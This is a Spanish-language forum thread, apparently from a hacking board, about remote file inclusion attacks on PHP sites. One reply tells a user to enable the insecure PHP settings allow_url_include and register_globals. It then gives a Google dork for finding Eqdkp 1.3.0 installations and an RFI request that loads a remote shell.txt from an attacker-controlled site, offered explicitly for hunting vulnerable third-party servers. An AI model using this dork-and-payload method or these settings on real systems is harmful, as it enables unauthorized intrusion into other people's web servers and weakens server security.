lo raro tmbn es que supuestamente yo cree, una web mediante el apache, vulnerable a estos ataques y me tira lo mismo que en muchas webs:
Citar
Warning: include(
Para ver los enlaces debes ser usuario
Crear Usuario o
Hacer Sesion) [function.include]: failed to open stream: HTTP request failed! HTTP/1.0 404 Not Found in C:\wamp\www\index.php on line 2
Warning: include() [function.include]: Failed opening '
Para ver los enlaces debes ser usuario
Crear Usuario o
Hacer Sesion' for inclusion (include_path='.;C:\php5\pear') in C:\wamp\www\index.php on line 2
Buenas... krosty478222.
Ese error lo que indica es que no se pudo incluir el HTTP, chequea si tienes el php.ini de tu servidor bien configurado para el RFI e incluir las URLs, para eso ve que tengas activas (en On) estas funciones:
; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
allow_url_fopen = On
; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
allow_url_include = On
; Whether or not to register the EGPCS variables as global variables. You may
; want to turn this off if you don't want to clutter your scripts' global scope
; with user data. This makes most sense when coupled with track_vars - in which
; case you can access all of the GPC variables through the $HTTP_*_VARS[],
; variables.
;
; You should do your best to write your scripts so that they do not require
; register_globals to be on; Using form variables as globals can easily lead
; to possible security problems, if the code is not very well thought of.
register_globals = On
Si no las tienes en On, ponlas y reinicias la computadora para que los cambios surjan efecto.
Y lo que es raro es que casi ninguna es vulnerable, esto es comun
Si, es común que paces horas buscando servidores vulnerables y no los encuentres. Lo ideal es buscar servidores que allan instalado algún software que venga con los códigos vulnerables a RFI. Por ejemplo, en lugar de buscar en google por "allinurl:index.php?page=", puedes intentar buscar servidores que tengan instalado el powered by Eqdkp 1.3.0... Una forma seria asi:
en google colocar: powered by Eqdkp 1.3.0
RFI: /includes/dbal.php?eqdkp_root_path=http://www.tuweb.com/shell.txt
A mi ese método me resulta más efectivo a la hora de encontrar servidores vulnerables a RFI.
También puedes visitar
Para ver los enlaces debes ser usuario
Crear Usuario o
Hacer Sesioneste
tema que trata sobre el RFI.
Un salu2 xD
Autor